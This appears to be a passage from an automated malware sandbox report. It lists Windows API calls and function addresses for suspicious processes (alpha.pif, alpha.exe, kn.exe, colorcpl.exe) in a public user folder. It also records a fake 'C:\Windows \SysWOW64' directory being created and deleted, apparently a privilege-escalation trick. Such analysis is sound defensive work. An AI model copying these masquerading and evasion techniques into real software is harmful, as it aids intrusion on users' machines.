Source: C:\Users\Public\alpha.pif	Code function: 16_2_00877460 EnterCriticalSection,LeaveCriticalSection,fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,	16_2_00877460
Source: C:\Users\Public\alpha.pif	Code function: 16_2_0087C1FA SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memcpy,memcpy,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,	16_2_0087C1FA
Source: C:\Users\Public\alpha.pif	Code function: 16_2_00866500 NtQueryInformationToken,NtQueryInformationToken,	16_2_00866500
Source: C:\Users\Public\alpha.pif	Code function: 16_2_0087A135 NtSetInformationFile,	16_2_0087A135
Source: C:\Users\Public\alpha.pif	Code function: 16_2_00854E3B _setjmp3,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,longjmp,	16_2_00854E3B
Source: C:\Users\Public\alpha.pif	Code function: 16_2_00864759 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,DeleteFileW,GetLastError,	16_2_00864759
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 19_2_06F5E357 NtdllDefWindowProc_A,GetCursorPos,SetForegroundWindow,TrackPopupMenu,IsWindowVisible,ShowWindow,ShowWindow,SetForegroundWindow,Shell_NotifyIcon,ExitProcess,CreatePopupMenu,AppendMenuA,	19_2_06F5E357

Source: C:\Users\Public\alpha.exe

Code function: 3_2_00007FF7823D5240: memset,GetFileSecurityW,GetSecurityDescriptorOwner,??_V@YAXPEAX@Z,memset,CreateFileW,DeviceIoControl,memmove,CloseHandle,??_V@YAXPEAX@Z,memset,FindClose,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,

3_2_00007FF7823D5240

Source: C:\Users\Public\alpha.exe

Code function: 3_2_00007FF7823E4224 InitializeProcThreadAttributeList,UpdateProcThreadAttribute,memset,memset,GetStartupInfoW,wcsrchr,lstrcmpW,SetConsoleMode,CreateProcessW,CloseHandle,CreateProcessAsUserW,_local_unwind,GetLastError,_local_unwind,_local_unwind,CloseHandle,DeleteProcThreadAttributeList,GetLastError,GetLastError,DeleteProcThreadAttributeList,

3_2_00007FF7823E4224

Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 19_2_004167EF ExitWindowsEx,LoadLibraryA,GetProcAddress,		19_2_004167EF
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 19_2_06F57526 ExitWindowsEx,LoadLibraryA,GetProcAddress,		19_2_06F57526

Source: C:\Users\Public\alpha.pif	File created: C:\Windows			Jump to behavior
Source: C:\Users\Public\alpha.pif	File created: C:\Windows \SysWOW64

Source: C:\Users\Public\alpha.pif

File deleted: C:\Windows \SysWOW64

Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF7823E37D8	3_2_00007FF7823E37D8
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF7823E5554	3_2_00007FF7823E5554
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF7823E0A6C	3_2_00007FF7823E0A6C
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF7823E4224	3_2_00007FF7823E4224
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF7823DAA54	3_2_00007FF7823DAA54
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF7823D5B70	3_2_00007FF7823D5B70
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF7823D3F90	3_2_00007FF7823D3F90
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF7823D372C	3_2_00007FF7823D372C
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF7823D9B50	3_2_00007FF7823D9B50
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF7823D6BE0	3_2_00007FF7823D6BE0
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF7823D3410	3_2_00007FF7823D3410
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF7823FAFBC	3_2_00007FF7823FAFBC
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF7823D1884	3_2_00007FF7823D1884
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF7823E7854	3_2_00007FF7823E7854
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF7823FAC4C	3_2_00007FF7823FAC4C
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF7823D2C48	3_2_00007FF7823D2C48
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF7823DB0D8	3_2_00007FF7823DB0D8
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF7823D8510	3_2_00007FF7823D8510
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF7823E18D4	3_2_00007FF7823E18D4
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF7823D7D30	3_2_00007FF7823D7D30
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF782401538	3_2_00007FF782401538
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF7823D8DF8	3_2_00007FF7823D8DF8
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF7823DCE10	3_2_00007FF7823DCE10
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF7823D81D4	3_2_00007FF7823D81D4
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF7823FD9D0	3_2_00007FF7823FD9D0
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF7823DE680	3_2_00007FF7823DE680
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF7823FEE88	3_2_00007FF7823FEE88
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF7823D2220	3_2_00007FF7823D2220
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF7823D4A30	3_2_00007FF7823D4A30
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF7823FAA30	3_2_00007FF7823FAA30
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF7823D5240	3_2_00007FF7823D5240
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF7823DD250	3_2_00007FF7823DD250
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF7823D9E50	3_2_00007FF7823D9E50
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF7823D7650	3_2_00007FF7823D7650
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF7823D6EE4	3_2_00007FF7823D6EE4
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF7823F7F00	3_2_00007FF7823F7F00
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF7823E37D8	5_2_00007FF7823E37D8
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF7823E5554	5_2_00007FF7823E5554
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF7823E0A6C	5_2_00007FF7823E0A6C
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF7823E4224	5_2_00007FF7823E4224
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF7823DAA54	5_2_00007FF7823DAA54
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF7823D5B70	5_2_00007FF7823D5B70
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF7823D3F90	5_2_00007FF7823D3F90
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF7823D372C	5_2_00007FF7823D372C
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF7823D9B50	5_2_00007FF7823D9B50
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF7823D6BE0	5_2_00007FF7823D6BE0
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF7823D3410	5_2_00007FF7823D3410
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF7823FAFBC	5_2_00007FF7823FAFBC
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF7823D1884	5_2_00007FF7823D1884
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF7823E7854	5_2_00007FF7823E7854
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF7823FAC4C	5_2_00007FF7823FAC4C
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF7823D2C48	5_2_00007FF7823D2C48
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF7823DB0D8	5_2_00007FF7823DB0D8
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF7823D8510	5_2_00007FF7823D8510
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF7823E18D4	5_2_00007FF7823E18D4
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF7823D7D30	5_2_00007FF7823D7D30
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF782401538	5_2_00007FF782401538
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF7823D8DF8	5_2_00007FF7823D8DF8
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF7823DCE10	5_2_00007FF7823DCE10
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF7823D81D4	5_2_00007FF7823D81D4
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF7823FD9D0	5_2_00007FF7823FD9D0
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF7823DE680	5_2_00007FF7823DE680
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF7823FEE88	5_2_00007FF7823FEE88
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF7823D2220	5_2_00007FF7823D2220
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF7823D4A30	5_2_00007FF7823D4A30
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF7823FAA30	5_2_00007FF7823FAA30
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF7823D5240	5_2_00007FF7823D5240
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF7823DD250	5_2_00007FF7823DD250
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF7823D9E50	5_2_00007FF7823D9E50
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF7823D7650	5_2_00007FF7823D7650
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF7823D6EE4	5_2_00007FF7823D6EE4
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF7823F7F00	5_2_00007FF7823F7F00
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2AACCB8	6_2_00007FF6A2AACCB8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2AAF020	6_2_00007FF6A2AAF020
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A29D2F38	6_2_00007FF6A29D2F38
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2AD3800	6_2_00007FF6A2AD3800
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2AABC10	6_2_00007FF6A2AABC10
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2AAC120	6_2_00007FF6A2AAC120
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A543D0	6_2_00007FF6A2A543D0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2AAE430	6_2_00007FF6A2AAE430
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A29CA424	6_2_00007FF6A29CA424
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2AD842F	6_2_00007FF6A2AD842F
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A48414	6_2_00007FF6A2A48414
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A29E4410	6_2_00007FF6A29E4410
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A56374	6_2_00007FF6A2A56374
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2AA234C	6_2_00007FF6A2AA234C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A20398	6_2_00007FF6A2A20398
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A0E3A0	6_2_00007FF6A2A0E3A0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A29D44E0	6_2_00007FF6A29D44E0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A4E4F0	6_2_00007FF6A2A4E4F0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2AA84D8	6_2_00007FF6A2AA84D8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A324D4	6_2_00007FF6A2A324D4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A29CC520	6_2_00007FF6A29CC520
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A3A450	6_2_00007FF6A2A3A450
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A3C450	6_2_00007FF6A2A3C450
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A064A8	6_2_00007FF6A2A064A8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2AA0490	6_2_00007FF6A2AA0490
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A58488	6_2_00007FF6A2A58488
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A18484	6_2_00007FF6A2A18484
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A4A1E8	6_2_00007FF6A2A4A1E8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A1C1D0	6_2_00007FF6A2A1C1D0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A8821C	6_2_00007FF6A2A8821C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2AD41F8	6_2_00007FF6A2AD41F8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A29C8170	6_2_00007FF6A29C8170
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A29E0140	6_2_00007FF6A29E0140
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2AA4274	6_2_00007FF6A2AA4274
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A1E29C	6_2_00007FF6A2A1E29C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A29E227C	6_2_00007FF6A29E227C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A36280	6_2_00007FF6A2A36280
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A4C7F0	6_2_00007FF6A2A4C7F0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A427D0	6_2_00007FF6A2A427D0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A707D0	6_2_00007FF6A2A707D0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2AB6750	6_2_00007FF6A2AB6750
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2AA08C8	6_2_00007FF6A2AA08C8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2AA48C4	6_2_00007FF6A2AA48C4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2AB2854	6_2_00007FF6A2AB2854
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A4E844	6_2_00007FF6A2A4E844
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A29D05E0	6_2_00007FF6A29D05E0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2AC85EC	6_2_00007FF6A2AC85EC
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A8C630	6_2_00007FF6A2A8C630
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A28630	6_2_00007FF6A2A28630
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A29F8570	6_2_00007FF6A29F8570
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A2655C	6_2_00007FF6A2A2655C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A94538	6_2_00007FF6A2A94538
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2AB85A8	6_2_00007FF6A2AB85A8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A5E57C	6_2_00007FF6A2A5E57C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A12580	6_2_00007FF6A2A12580
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A2C6D0	6_2_00007FF6A2A2C6D0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A3C6F8	6_2_00007FF6A2A3C6F8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A38BD4	6_2_00007FF6A2A38BD4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A10C28	6_2_00007FF6A2A10C28
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A0CBFC	6_2_00007FF6A2A0CBFC
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A29CAC08	6_2_00007FF6A29CAC08
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A29E4B68	6_2_00007FF6A29E4B68
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A76B94	6_2_00007FF6A2A76B94
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2AB8CF4	6_2_00007FF6A2AB8CF4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A18D2C	6_2_00007FF6A2A18D2C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A22D18	6_2_00007FF6A2A22D18
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A29D8D00	6_2_00007FF6A29D8D00
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A1CD10	6_2_00007FF6A2A1CD10
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A52CF8	6_2_00007FF6A2A52CF8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A98C58	6_2_00007FF6A2A98C58
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A5CCA8	6_2_00007FF6A2A5CCA8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2ACCC8C	6_2_00007FF6A2ACCC8C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A3CC80	6_2_00007FF6A2A3CC80
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A9A9F0	6_2_00007FF6A2A9A9F0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A209EC	6_2_00007FF6A2A209EC
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A2E9F0	6_2_00007FF6A2A2E9F0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A4AA00	6_2_00007FF6A2A4AA00
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A29C2940	6_2_00007FF6A29C2940
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A18990	6_2_00007FF6A2A18990
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A26984	6_2_00007FF6A2A26984
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A14B30	6_2_00007FF6A2A14B30
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2AAAA58	6_2_00007FF6A2AAAA58
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2AB4A58	6_2_00007FF6A2AB4A58
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A94A40	6_2_00007FF6A2A94A40
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A4EA7C	6_2_00007FF6A2A4EA7C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A46A84	6_2_00007FF6A2A46A84
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A29C1030	6_2_00007FF6A29C1030
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A64F94	6_2_00007FF6A2A64F94
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A29F4F90	6_2_00007FF6A29F4F90
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A8511C	6_2_00007FF6A2A8511C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A29DB09C	6_2_00007FF6A29DB09C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A0107C	6_2_00007FF6A2A0107C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A1D094	6_2_00007FF6A2A1D094
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2AA2D6C	6_2_00007FF6A2AA2D6C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A29EEDA4	6_2_00007FF6A29EEDA4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A36D7C	6_2_00007FF6A2A36D7C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A29C6EF4	6_2_00007FF6A29C6EF4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A29FEED4	6_2_00007FF6A29FEED4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A29E8F1C	6_2_00007FF6A29E8F1C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2AA4E58	6_2_00007FF6A2AA4E58
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2AA8EAC	6_2_00007FF6A2AA8EAC
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2AB33D0	6_2_00007FF6A2AB33D0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2AC33D4	6_2_00007FF6A2AC33D4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A0F434	6_2_00007FF6A2A0F434
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A29C73F8	6_2_00007FF6A29C73F8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A3D410	6_2_00007FF6A2A3D410
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A29EB36C	6_2_00007FF6A29EB36C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A29F7340	6_2_00007FF6A29F7340
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2AAB3AC	6_2_00007FF6A2AAB3AC
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A914F0	6_2_00007FF6A2A914F0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A3F520	6_2_00007FF6A2A3F520
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A6D460	6_2_00007FF6A2A6D460
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A29C5438	6_2_00007FF6A29C5438
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A0D440	6_2_00007FF6A2A0D440
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A29E54A0	6_2_00007FF6A29E54A0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2AB94A8	6_2_00007FF6A2AB94A8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A79494	6_2_00007FF6A2A79494
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A27478	6_2_00007FF6A2A27478
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A131E0	6_2_00007FF6A2A131E0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A111C8	6_2_00007FF6A2A111C8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A29DD1B8	6_2_00007FF6A29DD1B8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A4F168	6_2_00007FF6A2A4F168
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A392D8	6_2_00007FF6A2A392D8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A29CF2C0	6_2_00007FF6A29CF2C0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A1D2C0	6_2_00007FF6A2A1D2C0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A292C4	6_2_00007FF6A2A292C4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A55318	6_2_00007FF6A2A55318
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A9D2B4	6_2_00007FF6A2A9D2B4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A75290	6_2_00007FF6A2A75290
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A2D7F0	6_2_00007FF6A2A2D7F0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A377C8	6_2_00007FF6A2A377C8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A017D4	6_2_00007FF6A2A017D4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A29E1830	6_2_00007FF6A29E1830
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A73820	6_2_00007FF6A2A73820
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A29DF800	6_2_00007FF6A29DF800
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A43760	6_2_00007FF6A2A43760
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A19790	6_2_00007FF6A2A19790
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A29DB788	6_2_00007FF6A29DB788
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A158CC	6_2_00007FF6A2A158CC
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A93874	6_2_00007FF6A2A93874
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A5D858	6_2_00007FF6A2A5D858
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A5184C	6_2_00007FF6A2A5184C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A27890	6_2_00007FF6A2A27890
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A255F0	6_2_00007FF6A2A255F0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A495FC	6_2_00007FF6A2A495FC
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A29CF610	6_2_00007FF6A29CF610
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A29F156C	6_2_00007FF6A29F156C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A99580	6_2_00007FF6A2A99580
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A29FB58C	6_2_00007FF6A29FB58C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A4F6D8	6_2_00007FF6A2A4F6D8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A9D6DC	6_2_00007FF6A2A9D6DC
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A29ED660	6_2_00007FF6A29ED660
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A95660	6_2_00007FF6A2A95660
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2AA3638	6_2_00007FF6A2AA3638
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A05648	6_2_00007FF6A2A05648
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A176B0	6_2_00007FF6A2A176B0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A7D6A0	6_2_00007FF6A2A7D6A0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A77678	6_2_00007FF6A2A77678
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2AA7678	6_2_00007FF6A2AA7678
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A2DBF0	6_2_00007FF6A2A2DBF0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A29E9BC8	6_2_00007FF6A29E9BC8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A29FFC20	6_2_00007FF6A29FFC20
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A1FC34	6_2_00007FF6A2A1FC34
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A73C10	6_2_00007FF6A2A73C10
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A57B74	6_2_00007FF6A2A57B74
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A6FB50	6_2_00007FF6A2A6FB50
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A29C5BA4	6_2_00007FF6A29C5BA4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A29CFB84	6_2_00007FF6A29CFB84
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A31B84	6_2_00007FF6A2A31B84
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A1BCE8	6_2_00007FF6A2A1BCE8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A89CC0	6_2_00007FF6A2A89CC0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A29F9CD0	6_2_00007FF6A29F9CD0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A29FDD20	6_2_00007FF6A29FDD20
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A29D5D08	6_2_00007FF6A29D5D08
